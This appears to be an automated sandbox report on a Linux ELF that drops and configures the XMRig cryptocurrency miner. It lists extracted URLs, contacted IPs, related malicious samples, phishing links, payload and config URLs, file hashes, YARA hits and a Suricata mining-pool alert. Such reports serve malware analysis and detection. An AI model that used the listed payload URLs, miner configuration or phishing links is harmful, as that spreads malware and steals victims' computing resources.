https://vmtracker.freechildporninthisserver.lol/postgresqlstoresoftirq	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.securetrust.com/STCA.crl0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/spetterman66/verynicerepo/main/config.json0E1	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	Avira URL Cloud: safe	unknown
https://gcc.gnu.org/bugsrg/bugs/):	xmrig.12.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.catcert.net/verarrel	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.quovadisglobal.com/cps0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ubuntu.com/legal/terms-and-policies/privacy-policy	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.xrampsecurity.com/XGCA.crl0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.catcert.net/verarrel05	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xmrig.com/docs/algorithms	xmrig.12.dr	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.certigna.fr/certignarootca.crl01	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org?format=textcpu1	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	Avira URL Cloud: safe	unknown
https://xmrig.com/benchmark/%s	xmrig.12.dr	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	Avira URL Cloud: safe	unknown
http://www.accv.es00	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cert.fnmt.es/dpcs/0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	Avira URL Cloud: safe	unknown
http://policy.camerfirma.com0	xmr_linux_amd64 (2).elf, 6258.1.000000c000000000.000000c000800000.rw-.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false
185.199.109.133	raw.githubusercontent.com	Netherlands		54113	FASTLYUS	false
141.94.96.71	unknown	Germany		680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
140.82.121.3	github.com	United States		36459	GITHUBUS	false
109.202.202.202	unknown	Switzerland		13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom		41231	CANONICAL-ASGB	false
185.199.111.133	objects.githubusercontent.com	Netherlands		54113	FASTLYUS	false
91.189.91.42	unknown	United Kingdom		41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	fptlVDDPkS.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	zE7Ken4cFt.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	vstdlib_s64.dll.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	vstdlib_s64.dll.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.DropperX-gen.20063.4917.exe	Get hash	malicious	Stealc	Browse	api.ipify.org/
	Zoom_workspace.hta	Get hash	malicious	Cobalt Strike, Clipboard Hijacker	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.Evo-gen.28044.10443.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
185.199.109.133	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
185.199.109.133	SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll	Get hash	malicious	AsyncRAT, XWorm	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pool-fr.supportxmr.com	xmr_linux_amd64.elf	Get hash	malicious	Xmrig	Browse	141.94.96.195
	SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe	Get hash	malicious	Xmrig	Browse	141.94.96.144
	Q3pEXxmWAD.exe	Get hash	malicious	Xmrig	Browse	141.94.96.195
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar, Xmrig	Browse	141.94.96.71
	kWYLtJ0Cn1.exe	Get hash	malicious	LoaderBot, Xmrig	Browse	141.94.96.195
	updater.exe	Get hash	malicious	Xmrig	Browse	141.94.96.71
	xjSglbp263.exe	Get hash	malicious	Xmrig	Browse	141.94.96.71
	gwRQinPOHB.exe	Get hash	malicious	Xmrig	Browse	141.94.96.195
	FieroHack.exe	Get hash	malicious	Xmrig	Browse	141.94.96.195
	FieroHack.exe	Get hash	malicious	LummaC, Xmrig	Browse	141.94.96.195
raw.githubusercontent.com	http://reetukhichar.github.io/netflix-clone	Get hash	malicious	HTMLPhisher	Browse	185.199.110.133
	printui.dll	Get hash	malicious	Unknown	Browse	185.199.108.133
	3gFZ4XL3lx.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	AX3-GUI-45.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	VegaX.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	VegaX.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	xmr_linux_amd64.elf	Get hash	malicious	Xmrig	Browse	185.199.108.133
	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	185.199.110.133
	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	185.199.109.133
	SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll	Get hash	malicious	AsyncRAT, XWorm	Browse	185.199.109.133
github.com	Drawing specification and Issued PO #07329.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	140.82.121.4
	Drawing specification and Issued PO 07329.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	140.82.121.4
	Request For Quotation.js	Get hash	malicious	STRRAT	Browse	140.82.121.4
	http://reetukhichar.github.io/netflix-clone	Get hash	malicious	HTMLPhisher	Browse	140.82.121.4
	printui.dll	Get hash	malicious	Unknown	Browse	140.82.121.3
	https://github.com/greenshot/greenshot/releases/download/Greenshot-RELEASE-1.2.10.6/Greenshot-INSTALLER-1.2.10.6-RELEASE.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	VegaX.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	VegaX.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
api.ipify.org	F#U0130YAT TEKL#U0130F#U0130-2400.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	SPW AW25 - PO.010 SMS.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	SPW AW25 - PO.010 SMS.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Invoice_0167562.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://dionthompson.com/a/?ThiNTMtNGYyOS1hNDc1LTA2YWQzNmJkNDc5ZQAQAIGKzFxi43JDqxvx%2BxZRlAU%3D	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	RFQ_PO_KMM7983972_ORDER_DETAILS.js	Get hash	malicious	AgentTesla, RedLine	Browse	104.26.12.205
	MV ALIADO - S-REQ-19-00064.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	104.26.12.205
	CB5BlW3lBc.ps1	Get hash	malicious	AsyncRAT	Browse	104.26.13.205
	yLIMUr0fMI.ps1	Get hash	malicious	AsyncRAT	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.173.81
	update.ps1	Get hash	malicious	NetSupport RAT	Browse	172.67.215.33
	http://is.gd/EmlK8C	Get hash	malicious	Unknown	Browse	104.18.36.155
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.16.38
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.44.191
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.44.191
	TravellingPositions_nopump.exe	Get hash	malicious	LummaC	Browse	104.21.88.61
	github-scanner.com.ps1	Get hash	malicious	LummaC	Browse	104.21.20.40
	https://yafracrattemo.vercel.app/ru.html	Get hash	malicious	HTMLPhisher	Browse	172.67.75.166
	ActSet.ps1	Get hash	malicious	Fredy Stealer	Browse	172.67.143.204
DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	ZgBCG135hk.elf	Get hash	malicious	Mirai, Moobot	Browse	193.175.239.129
	XPK8NKw7Jv.elf	Get hash	malicious	Mirai, Moobot	Browse	134.177.38.19
	cQOoKCZyG3.elf	Get hash	malicious	Mirai	Browse	141.46.244.240
	XHrUkAemNj.elf	Get hash	malicious	Unknown	Browse	137.193.8.169
	SecuriteInfo.com.Linux.Siggen.9999.6095.9527.elf	Get hash	malicious	Mirai	Browse	137.249.226.64
	SecuriteInfo.com.Linux.Siggen.9999.8163.26295.elf	Get hash	malicious	Mirai	Browse	141.55.19.202
	https://www.google.com/url?rct=j&sa=t&url=https://www.wistv.com/2024/09/18/how-register-vote-sc/&ct=ga&cd=CAEYACoUMTE1ODk5MTgyNjc5Mjk4MDkxNDYyHGQ3YWE0YjIyZjk5ZTBkYTg6Y29tOmVuOlVTOlI&usg=AOvVaw2u71nyB5_za_kch4LRgAMu	Get hash	malicious	Unknown	Browse	141.95.98.65
	https://www.google.com/url?rct=j&sa=t&url=https://www.wistv.com/2024/09/18/how-register-vote-sc/&ct=ga&cd=CAEYAyoTNDI3NTE2NDk3MjQxMjk2MDMxNTIaZjdkMjBhNTQwODRiMzY2OTpjb206ZW46VVM&usg=AOvVaw2u71nyB5_za_kch4LRgAMu	Get hash	malicious	Unknown	Browse	141.95.98.65
	xmr_linux_amd64.elf	Get hash	malicious	Xmrig	Browse	141.94.96.195
	http://www.inboundlogistics.com	Get hash	malicious	Unknown	Browse	141.95.98.64
FASTLYUS	https://docs3.google.com/drawings/d/1-YlfxcIlzVfTGHw5rquNE-USEQmDoin5y8OekQ3QMSA/preview	Get hash	malicious	Unknown	Browse	151.101.130.137
	http://is.gd/EmlK8C	Get hash	malicious	Unknown	Browse	199.232.188.159
	Drawing specification and Issued PO #07329.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	199.232.192.209
	Drawing specification and Issued PO 07329.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	199.232.196.209
	Request For Quotation.js	Get hash	malicious	STRRAT	Browse	199.232.192.209
	http://ymc8.informz.net/z/cjUucD9taT0zOTI4MzU0JnU9NDExMjkzMTk0JmxpPTQxMDE5ODI2Jmw9aHR0cHM6Ly9iNGIwbGF0LXQzbm4xNS1jMHVyNy1iNDExMG4uczMuZXUtd2VzdC0xLmFtYXpvbmF3cy5jb20vaW5kZXguaHRtbA==/index.html	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://www.google.co.ls/url?url=https://pjgzknracpucs&cu=yxzbqlc&dknmbu=neq&ilrcq=atzggn&vra=ijlrrlr&yhbyc=bzlzgg&frfp=ynolmdfb&jkcxlp=ajlekjss&q=amp/asterpetroleo.com/.cgi-bin/nkqy/CVWLS/dG9tLmJ1cmdoYXJ0QHJzbGkuY29t&ljxfk=cnjfey&kqdqaeo=gnfcrepa&ddayyvkbt=qg&mhg=xzmbrfwuc&veu=gbmtcee&wusgzo=nbo&bmtdy=vnrwhp&ifb=rklwlup&kiiou=sfajza&vegi=crbiqqli&nkuoui=amzherpj&hvj=wtzg&bseos=yhnhxn&yhucgnu=mianxbuq&sewtmxxvi=lu&ndv=eomqodtth&ysq=ovjbkam&jvrehd=hcd&votrm=bedgkv&mrj=oxokzew&gythv=keqhcg&wcqw=ranlyiwi&jtcxme=prbgwkpp&ewl=zsaz&aoaoy=mxpxen&pqarhgs=vabchqht&arvcbmbum=ov&sad=rncnzmjhl&xgw=ncegjdk&jpaxcj=tav&iihwq=hdebgl&ukv=qcjmtvy&vtpue=cdwxlt&jpws=xniphwaj&tokvsg=nrkywccw	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://drive.google.com/file/d/1Js218jH45aZfDBuhpr6Ra7DU7himIukb/view?usp=drive_link	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	151.101.194.137
	https://akshayv06.github.io/codsoft_taskno1	Get hash	malicious	HTMLPhisher	Browse	199.232.188.159
	https://cronux7.github.io/NetflixResponsiveClone	Get hash	malicious	HTMLPhisher	Browse	185.199.110.153
GITHUBUS	Drawing specification and Issued PO #07329.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	140.82.121.4
	Drawing specification and Issued PO 07329.jar	Get hash	malicious	Caesium Obfuscator, STRRAT	Browse	140.82.121.4
	Request For Quotation.js	Get hash	malicious	STRRAT	Browse	140.82.121.4
	https://akshayv06.github.io/codsoft_taskno1	Get hash	malicious	HTMLPhisher	Browse	140.82.113.17
	http://reetukhichar.github.io/netflix-clone	Get hash	malicious	HTMLPhisher	Browse	140.82.121.4
	https://www.cyderes.com/e3t/Ctc/ON+113/cpWbt04/VX4GLN83B5sSVcgNxQ2Ps5TgVfQRxk5l9kHPN48YK9C5m_5PW50kH_H6lZ3pVW8y4rsC3Frq3xW6yS46B81vNwBW7nKjzX7rlDGLW8Pgnsm2TMWP7W8BGJ3S7v4twJW4Frjvh65WTfKVTz5h-5gQP1gMVRZvWxc0gFW70YCkf5Yr5gxW4_ym5p4kM2HWW8XQLRs2fQKTSW6H8zL35wntpYW2g-lt23Pgmr-W5tJKtK3hc6rbW6CjtL61FP38FN8Dg60fYghyWW9bC6JC3rZqmzW8VJhP664ltDxW1lwcb13ZpPGyW5K_1JQ3TqNPdW95WCPZ4QLNngW273xc864PDv3W5x93bB7dRNxTW92-5jF1RVBWpW8x57FF7P2xcjW7KK8Xj8n_ZZMW7CgpVb566CBBW8bVlWQ11xhLlVs3yDJ8NdTRzW12g9Fn559wR0W9bq01776CWknW5nG39p82bgTcf5RLlBK04	Get hash	malicious	Follina CVE-2022-30190	Browse	140.82.121.4
	printui.dll	Get hash	malicious	Unknown	Browse	140.82.121.3
	https://github.com/greenshot/greenshot/releases/download/Greenshot-RELEASE-1.2.10.6/Greenshot-INSTALLER-1.2.10.6-RELEASE.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	VegaX.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	VegaX.exe	Get hash	malicious	Unknown	Browse	140.82.121.3

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
/tmp/xmrig/xmrig-6.21.3/xmrig	xmr_linux_amd64.elf	Get hash	malicious	Xmrig	Browse

Created / dropped Files

/sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages

Process:	/tmp/xmrig/xmrig-6.21.3/xmrig
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:W:W
MD5:	ECCBC87E4B5CE2FE28308FD9F2A7BAF3
SHA1:	77DE68DAECD823BABBB58EDB1C8E14D7106E83BB
SHA-256:	4E07408562BEDB8B60CE05C1DECFE3AD16B72230967DE01F640B7E4729B49FCE
SHA-512:	3BAFBF08882A2D10133093A1B8433F50563B93C14ACD05B79028EB1D12799027241450980651994501423A66C276AE26C43B739BC65C4E16B10C3AF6C202AEBB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	3

/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages

Process:	/tmp/xmrig/xmrig-6.21.3/xmrig
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	6
Entropy (8bit):	1.7924812503605778
Encrypted:	false
SSDEEP:	3:o:o
MD5:	3C8244023D2177FD106C5822AE347207
SHA1:	5A39F98EBC7B125EB28970B7345B9C5A1B72F8E7
SHA-256:	A931B1D72AD5A1577FEFDC9E40761B6190A2534BFBAC2A9524993AD024219D59
SHA-512:	FEEFE4B83893033EBD8E934AEF5BAF7982B47BB738BBFE3E114CF874F549428979570D24A0F4B1671C938538E3A2BEC5D7C0CF6FCA5E548EDA515467C2C1BAA9
Malicious:	false
Reputation:	low
Preview:	211061

/tmp/xmrig/xmrig-6.21.3/SHA256SUMS

Process:	/tmp/xmr_linux_amd64 (2).elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	150
Entropy (8bit):	4.42633466447499
Encrypted:	false
SSDEEP:	3:s17eV3g0BFRm9t2idDcQW3mXT/JXSKbPxgImIVdUR3kUAQ6JXFFFdID:s16eeRm9tj2mDF5bPxgImI+39OV8
MD5:	4F3BE397A97FE6981754DAEFF1C2B77B
SHA1:	251612464045242636103E61DA4A0BC02C8FB99B
SHA-256:	1410925F0EC5A63A042402FD06A1037C06530AEFA065AA80A242D82B580C571C
SHA-512:	A22C03E97750A3BD02021514FD12475F502934D94F6B7CF44A2D0A3469618864F8E31DF09E84DB5F1F1E1BE277492922528C614A67DC766754CA4F2E003C880A
Malicious:	false
Reputation:	low
Preview:	2b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec config.json.72ac2877c9e4cd7d70673c0643eb16805977a9b8d55b6b2e5a6491db565cee1f xmrig.

/tmp/xmrig/xmrig-6.21.3/config.json

Process:	/tmp/xmr_linux_amd64 (2).elf
File Type:	JSON data
Category:	dropped
Size (bytes):	9460
Entropy (8bit):	3.925498310902404
Encrypted:	false
SSDEEP:	192:LSCgCZC4uaCAW2l0tjM5LRPoN4jW2l0tjMVLRPo3Y:LebG9RJ
MD5:	0AD635B319080EC3EB302AFC012E9AA0
SHA1:	10C5C3D4FEB648FE46E0FE3562F6596E12AA9681
SHA-256:	9864A764DB25ED82EDC75FB357871B1D71369619272C554CD49A682E387442B2
SHA-512:	C63BA33832CCDFFE78BADF071D9C55F2288DF82A8F17428307448DFA591E8C4D129F9D3BF63645796E3976680F974E8A79778E87C05423F75BF1CAC3CD0C2C01
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: /tmp/xmrig/xmrig-6.21.3/config.json, Author: Joe Security
Reputation:	low
Preview:	{. "api": {. "id": null,. "worker-id": null. },. "http": {. "enabled": false,. "host": "127.0.0.1",. "port": 0,. "access-token": null,. "restricted": true. },. "autosave": true,. "background": false,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": null,. "memory-pool": false,. "yield": true,. "max-threads-hint": 100,. "asm": true,. "argon2-impl": null,. "cn/0": false,. "cn-lite/0": false. },. "opencl": {. "enabled": false,. "cache": true,. "loader": null,.

/tmp/xmrig/xmrig-6.21.3/xmrig

Process:	/tmp/xmr_linux_amd64 (2).elf
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=989c8e3124a392451d99d52d4ffe7c9e75b887f2, stripped
Category:	dropped
Size (bytes):	8285424
Entropy (8bit):	6.439178867876674
Encrypted:	false
SSDEEP:	98304:do7w7BdASlHaQkZcWukkzX00ME6R1vkWCZv4TgPEwQoUCgSuLWFCQUhF9VxjzFO8:bFlHaL8QoJRCLvlbNwQpEZlpjMYOQW
MD5:	7429D24207B100F6C164BF4703B5941E
SHA1:	A7FAD4DE1CE0ED2C137C09D4BF9FE7276555F4A0
SHA-256:	72AC2877C9E4CD7D70673C0643EB16805977A9B8D55B6B2E5A6491DB565CEE1F
SHA-512:	7D9BCB836D154F5F143815749C36DC928036FB718F4242062A70AA921CBFFDD763E167552C79070DF1AD8AE7C02647892BCFAA859E24137C3CD41A7F6F6CAE27
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: /tmp/xmrig/xmrig-6.21.3/xmrig, Author: Joe Security Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: /tmp/xmrig/xmrig-6.21.3/xmrig, Author: unknown Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: /tmp/xmrig/xmrig-6.21.3/xmrig, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:	Filename: xmr_linux_amd64.elf, Detection: malicious, Browse
Reputation:	low
Preview:	.ELF..............>.......@.....@.......ph~.........@.8...@.......................@.......@...............................................@.......@.....J.\.....J.\.......................\.....................1.......1....................... .w..... ...... ......p........D......................p.......p.@.....p.@.....0.......0.................................@.......@.....$.......$....................... .w..... ...... .............. ...............S.td....p.......p.@.....p.@.....0.......0...............Q.td....................................................R.td.... .w..... ...... .......3.......3.................. .......GNU.............................................GNU....1$..E...-O.\|.u.......................................................................................................................................................................................................................................................................................................

/tmp/xmrig/xmrig.tar.gz

Process:	/tmp/xmr_linux_amd64 (2).elf
File Type:	gzip compressed data, from Unix, original size modulo 2^32 8291840
Category:	dropped
Size (bytes):	3505638
Entropy (8bit):	7.993555494222719
Encrypted:	true
SSDEEP:	98304:YH2UpN2u4Nfu46bgzZgA9pl5T8YCjtDjb6UWcM:QT2JtVgA9plV8fecM
MD5:	06B8367FC7B84A666A561A6915A4501D
SHA1:	D06991F03408390059DF8FC387AC7923E4B5FB7A
SHA-256:	A0EEFD7A5C0EFD1CAC153A075B4FDEAD443A04F11CC587A09BD5AC09E174F10F
SHA-512:	8D507BC49CEBF932B7F248C5AEA83977352E8E88E02CDBB6CC57D040C0E754AB514106156D42A0ADA5D3D4DD549CD6272EC9ACA966127430B51680926F98E204
Malicious:	false
Reputation:	low
Preview:	...........Z.\|...Z..eye}y%O.bj.6M.....J!..b.!M.6.&!Ki)..T..^.+..W.r.. h...X..pA..\|.L_.^.s.).w..$.\|..O.[n._.....,s.../.T.m.....Mz...oS.ju.N..F.U.?.E.dek4.:.N...Lh...od...<^.[...\|6.......s..GKM.....r[E.B...k.......i.........h....4....>.u..P.L.[.x.kP...m..n......^du.B]......^.X..a.[.\n.{.a.../..4..t5...u..n.T..Lf...Qy....h..V..m3{...g..e.y..S...qj......9".K3;.N.G.....~..aqV.D..aC.U...4...&#...iA....k.T.S..#.7.........-I6......R...S4...6y...e..m-...\|n.F.T....\G...UXC..O..z.N..L.1b.]n..m..F.TY...Z...K..Y..6V.jT.J..d.m..D.......p:2T..=....j...f..n.Z..D^u.......":..f.&..-.3..[.t.@.....b....e.f...K...PGu.e...0y...."5b.........;+T.6...J.x.8....=D.B{.3j(.B.-:g.......Wg..8.....%-...J..8..7.........SAII$.e.i5....Kdv.w..Zi.TF{.v/.Z]&..&R...2....%.P.....aQ.'a...........f.X......${\|eU...N.$...C.FX...`...*.......n}V..[...T."..+.V4.i.(..L0.aTO...1b{b..E.."..4....NVw.?(u.".DV5.\.V.. ..%(.k...m..:-X.....%......T..q%.`...4X.eN....v&v?u...P..

Static File Info

General

File type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.127068800929057
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 49.77% ELF Executable and Linkable format (generic) (4004/1) 49.46% Lumena CEL bitmap (63/63) 0.78%
File name:	xmr_linux_amd64 (2).elf
File size:	9'076'871 bytes
MD5:	2352fd3e33ed079446cad48ee044df18
SHA1:	2c1802e6f3eb067984245b0c23d2f093a93a42cc
SHA256:	dbf22aada7e9efa11116411e1d6f18f6ecbb215d53e21d6f769e1869f4e8160b
SHA512:	8a7c06d8db5083300844f8100a8bfeee4e0566b89a4c6791b1bc2b4a12cb55fe12f1d07dfbd972b58944cb2c3f5a0ce24cda554b3a82f07fe031795de290d637
SSDEEP:	49152:I629tnIbPfVYG2VSLDhZlCcbZeXAGM0R62LP6XmhgeyWZ3Twkj5EgUuEZ/3z7JJP:I6CtuPdYWhZYGGM0RN6Xm2EPVEgq3/L
TLSH:	A7964A17F8E60894D8FDD2B0867A8226E971785C1B3923DB67A0B6302F337F15976B44
File Content Preview:	.ELF..............>.......F.....@.......X...........@.8...@.............@.......@.@.....@.@...............................................@.......@.......V.......V.......................V......................./......./....................................

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x460fe0
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	5
Section Header Offset:	344
Section Header Size:	64
Number of Section Headers:	13
Header String Table Index:	12

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.text	PROGBITS	0x401000	0x1000	0x56a086	0x0	0x6	AX	0	0	32
.rodata	PROGBITS	0x96c000	0x56c000	0x15e7ad	0x0	0x2	A	0	0	32
.typelink	PROGBITS	0xaca7c0	0x6ca7c0	0x227c	0x0	0x2	A	0	0	32
.itablink	PROGBITS	0xacca40	0x6cca40	0x908	0x0	0x2	A	0	0	32
.gosymtab	PROGBITS	0xacd348	0x6cd348	0x0	0x0	0x2	A	0	0	1
.gopclntab	PROGBITS	0xacd360	0x6cd360	0x19ce90	0x0	0x2	A	0	0	32
.go.buildinfo	PROGBITS	0xc6b000	0x86b000	0x30	0x0	0x3	WA	0	0	16
.noptrdata	PROGBITS	0xc6b040	0x86b040	0x2d740	0x0	0x3	WA	0	0	32
.data	PROGBITS	0xc98780	0x898780	0xf798	0x0	0x3	WA	0	0	32
.bss	NOBITS	0xca7f20	0x8a7f20	0x640b0	0x0	0x3	WA	0	0	32
.noptrbss	NOBITS	0xd0bfe0	0x90bfe0	0xb902	0x0	0x3	WA	0	0	32
.shstrtab	STRTAB	0x0	0x8a8000	0x87	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Prog Interpreter	Section Mappings
PHDR	0x40	0x400040	0x400040	0x118	0x118	1.6828	0x4	R	0x1000
LOAD	0x0	0x400000	0x400000	0x56b086	0x56b086	6.2608	0x5	R E	0x1000		.text
LOAD	0x56c000	0x96c000	0x96c000	0x2fe1f0	0x2fe1f0	5.2563	0x4	R	0x1000		.rodata .typelink .itablink .gosymtab .gopclntab
LOAD	0x86b000	0xc6b000	0xc6b000	0x3cf20	0xac8e2	4.8026	0x6	RW	0x1000		.go.buildinfo .noptrdata .data .bss .noptrbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x8

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-21T21:26:23.428329+0200	2047928	ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)	2	192.168.2.23	35974	1.1.1.1	53	UDP
